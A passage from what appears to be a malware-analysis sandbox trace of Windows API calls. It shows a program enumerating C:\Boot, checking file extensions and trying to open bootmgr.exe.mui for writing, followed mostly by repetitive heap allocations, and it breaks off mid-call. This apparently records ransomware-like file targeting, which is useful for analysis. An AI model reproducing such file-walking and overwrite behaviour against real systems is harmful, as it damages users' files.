ftLastAccessTime.dwLowDateTime=0x28d844e0, ftLastAccessTime.dwHighDateTime=0x1d706aa, ftLastWriteTime.dwLowDateTime=0x28d844e0, ftLastWriteTime.dwHighDateTime=0x1d706aa, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0188.248] FindNextFileW (in: hFindFile=0x2cfe100, lpFindFileData=0x312fba4 | out: lpFindFileData=0x312fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x956aa140, ftCreationTime.dwHighDateTime=0x1d70554, ftLastAccessTime.dwLowDateTime=0x28d844e0, ftLastAccessTime.dwHighDateTime=0x1d706aa, ftLastWriteTime.dwLowDateTime=0xe817e7d8, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x16240, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0188.248] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83a70 [0188.248] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x2cddd80 [0188.248] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83a70 | out: hHeap=0x620000) returned 1 [0188.248] PathFindExtensionW (pszPath="C:\\Boot\\hu-HU\\bootmgr.exe.mui") returned=".mui" [0188.248] CreateFileW (lpFileName="C:\\Boot\\hu-HU\\bootmgr.exe.mui" (normalized: "c:\\boot\\hu-hu\\bootmgr.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0188.249] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cddd80 | out: hHeap=0x620000) returned 1 [0188.249] FindNextFileW (in: hFindFile=0x2cfe100, lpFindFileData=0x312fba4 | out: lpFindFileData=0x312fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x956aa140, ftCreationTime.dwHighDateTime=0x1d70554, ftLastAccessTime.dwLowDateTime=0x28d844e0, ftLastAccessTime.dwHighDateTime=0x1d706aa, ftLastWriteTime.dwLowDateTime=0xe817e7d8, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x16240, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 0 [0188.249] FindClose (in: hFindFile=0x2cfe100 | out: hFindFile=0x2cfe100) returned 1 [0188.249] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0188.250] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83fe8 | out: hHeap=0x620000) returned 1 [0188.250] PeekMessageW (in: lpMsg=0x312ff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x312ff08) returned 0 [0188.250] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83fe8 [0188.250] PeekMessageW (in: lpMsg=0x312fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x312fb74) returned 0 [0188.250] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83a70 [0188.250] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e765d0 [0188.250] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0188.250] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83a70 | out: hHeap=0x620000) returned 1 [0188.251] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83a70 [0188.251] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e765d0 [0188.251] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0188.251] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83a70 | out: hHeap=0x620000) returned 1 [0188.251] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83a70 [0188.251] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e765d0 [0188.252] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0188.252] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83a70 | out: hHeap=0x620000) returned 1 [0188.252] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83a70 [0188.252] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e765d0 [0188.252] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0188.253] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83a70 | out: hHeap=0x620000) returned 1 [0188.253] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83a70 [0188.253] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e765d0 [0188.253] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0188.253] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83a70 | out: hHeap=0x620000) returned 1 [0188.253] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83a70 [0188.254] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x840) returned 0x2e765d0 [0188.254] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0188.254] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83a70 | out: hHeap=0x620000) returned 1 [0188.254] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83a70 [0188.254] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e765d0 [0188.254] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc2e) returned 0x2e902a8 [0188.255] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0188.255] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e902a8 | out: hHeap=0x620000) returned 1 [0188.255] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83a70 | out: hHeap=0x620000) returned 1 [0188.256] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83a70 [0188.256] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e765d0 [0188.256] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0188.256] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83a70 | out: hHeap=0x620000) returned 1 [0188.256] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83a70 [0188.256] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x840) returned 0x2e765d0 [0188.257] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0188.257] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83a70 | out: hHeap=0x620000) returned 1 [0188.257] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83a70 [0188.257] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x850) returned 0x2e765d0 [0188.258] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0188.258] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83a70 | out: hHeap=0x620000) returned 1 [0188.258] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83a70 [0188.258] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x850) returned 0x2e765d0 [0188.258] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0188.258] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83a70 | out: hHeap=0x620000) returned 1 [0188.258] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83a70 [0188.258] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e765d0 [0188.259] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0188.259] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83a70 | out: hHeap=0x620000) returned 1 [0188.259] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83a70 [0188.259] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e765d0 [0188.259] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0188.260] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83a70 | out: hHeap=0x620000) returned 1 [0188.260] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83a70 [0188.260] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x840) returned 0x2e765d0 [0188.260] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0188.260] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83a70 | out: hHeap=0x620000) returned 1 [0188.260] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83a70 [0188.260] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x840) returned 0x2e765d0 [0188.260] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0188.261] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83a70 | out: hHeap=0x620000) returned 1 [0188.261] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83a70 [0188.261] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e765d0 [0188.261] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0188.261] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83a70 | out: hHeap=0x620000) returned 1 [0188.261] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83a70 [0188.261] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e765d0 [0188.262] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0188.262] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83a70 | out: hHeap=0x620000) returned 1 [0188.262] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83a70 [0188.262] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e765d0 [0188.263] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0188.263] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83a70 | out: hHeap=0x620000) returned 1 [0188.263] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83a70 [0188.263] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e765d0 [0188.263] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0188.264] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83a70 | out: hHeap=0x620000) returned 1 [0188.264] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83a70 [0188.264] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e765d0 [0188.264] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0188.264] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83a70 | out: hHeap=0x620000) returned 1 [0188.264] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83a70 [0188.264] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e765d0 [0188.265] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0188.265] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83a70 | out: hHeap=0x620000) returned 1 [0188.265] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83a70 [0188.265] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e765d0 [0188.265] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0188.265] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83a70 | out: hHeap=0x620000) returned 1 [0188.265] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83a70 [0188.265] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e765d0 [0188.265] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc46) returned 0x2e902a8 [0188.266] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0188.266] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e902a8 | out: hHeap=0x620000) returned 1 [0188.266] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83a70 | out: hHeap=0x620000) returned 1 [0188.266] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83a70 [0188.266] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e765d0 [0188.267] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0188.267] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83a70 | out: hHeap=0x620000) returned 1 [0188.267] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83a70 [0188.267] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e765d0 [0188.267] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc2e) returned 0x2e902a8 [0188.267] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0188.267] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e902a8 | out: hHeap=0x620000) returned 1 [0188.268] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83a70 | out: hHeap=0x620000) returned 1 [0188.268] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83a70 [0188.268] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x850) returned 0x2e765d0 [0188.268] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0188.268] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83a70 | out: hHeap=0x620000) returned 1 [0188.268] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83a70 [0188.268] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x850) returned 0x2e765d0 [0188.269] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0188.269] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83a70 | out: hHeap=0x620000) returned 1 [0188.269] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83a70 [0188.269] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e765d0 [0188.269] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0188.270] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83a70 | out: hHeap=0x620000) returned 1 [0188.270] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83a70 [0188.270] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e765d0 [0188.270] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0188.270] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83a70 | out: hHeap=0x620000) returned 1 [0188.270] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83a70 [0188.270] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e765d0 [0188.270] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc46) returned 0x2e902a8 [0188.271] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0188.271] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e902a8 | out: hHeap=0x620000) returned 1 [0188.271] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83a70 | out: hHeap=0x620000) returned 1 [0188.271] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83a70 [0188.271] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x840) returned 0x2e765d0 [0188.272] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0188.272] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83a70 | out: hHeap=0x620000) returned 1 [0188.272] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83a70 [0188.272] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x840) returned 0x2e765d0 [0188.272] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0188.272] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83a70 | out: hHeap=0x620000) returned 1 [0188.272] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83a70 [0188.272] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e765d0 [0188.273] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0188.273] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83a70 | out: hHeap=0x620000) returned 1 [0188.273] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83a70 [0188.273] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e765d0 [0188.273] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0188.274] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83a70 | out: hHeap=0x620000) returned 1 [0188.274] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83a70 [0188.274] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e765d0 [0188.274] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0188.274] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83a70 | out: hHeap=0x620000) returned 1 [0188.274] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83a70 [0188.274] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e765d0 [0188.275] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0188.275] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83a70 | out: hHeap=0x620000) returned 1 [0188.275] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83a70 [0188.275] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e765d0 [0188.275] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0188.276] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83a70 | out: hHeap=0x620000) returned 1 [0188.276] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83a70 [0188.276] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e765d0 [0188.276] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0188.276] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83a70 | out: hHeap=0x620000) returned 1 [0188.276] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83a70 [0188.276] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e765d0 [0188.277] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0188.277] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83a70 | out: hHeap=0x620000) returned 1 [0188.277] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83a70 [0188.277] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e765d0 [0188.277] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc46) returned 0x2e902a8 [0188.277] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0188.278] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e902a8 | out: hHeap=0x620000) returned 1 [0188.278] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83a70 | out: hHeap=0x620000) returned 1 [0188.278] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83a70 [0188.278] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e765d0 [0188.279] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0188.279] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83a70 | out: hHeap=0x620000) returned 1 [0188.279] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83a70 [0188.279] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x850) returned 0x2e765d0 [0188.280] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0188.280] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83a70 | out: hHeap=0x620000) returned 1 [0188.280] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83a70 [0188.280] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x850) returned 0x2e765d0 [0188.280] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0188.281] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83a70 | out: hHeap=0x620000) returned 1 [0188.281] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83a70 [0188.281] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e765d0 [0188.281] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0188.281] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83a70 | out: hHeap=0x620000) returned 1 [0188.281] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83a70 [0188.281] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e765d0 [0188.282] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0188.282] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83a70 | out: hHeap=0x620000) returned 1 [0188.282] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83a70 [0188.282] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e765d0 [0188.282] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc46) returned 0x2e902a8 [0188.282] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0188.283] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e902a8 | out: hHeap=0x620000) returned 1 [0188.283] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83a70 | out: hHeap=0x620000) returned 1 [0188.283] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83a70 [0188.283] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x840) returned 0x2e765d0 [0188.283] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0188.284] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83a70 | out: hHeap=0x620000) returned 1 [0188.284] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83a70 [0188.284] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x840) returned 0x2e765d0 [0188.284] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0188.285] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83a70 | out: hHeap=0x620000) returned 1 [0188.285] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83a70 [0188.285] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e765d0 [0188.285] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0188.285] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83a70 | out: hHeap=0x620000) returned 1 [0188.285] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83a70 [0188.286] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e765d0 [0188.286] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0188.286] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83a70 | out: hHeap=0x620000) returned 1 [0188.286] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83a70 [0188.286] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e765d0 [0188.287] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0188.287] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83a70 | out: hHeap=0x620000) returned 1 [0188.287] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83a70 [0188.287] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e765d0 [0188.287] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0188.288] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83a70 | out: hHeap=0x620000) returned 1 [0188.288] RtlAllocateHeap (HeapHandle=0x620000, 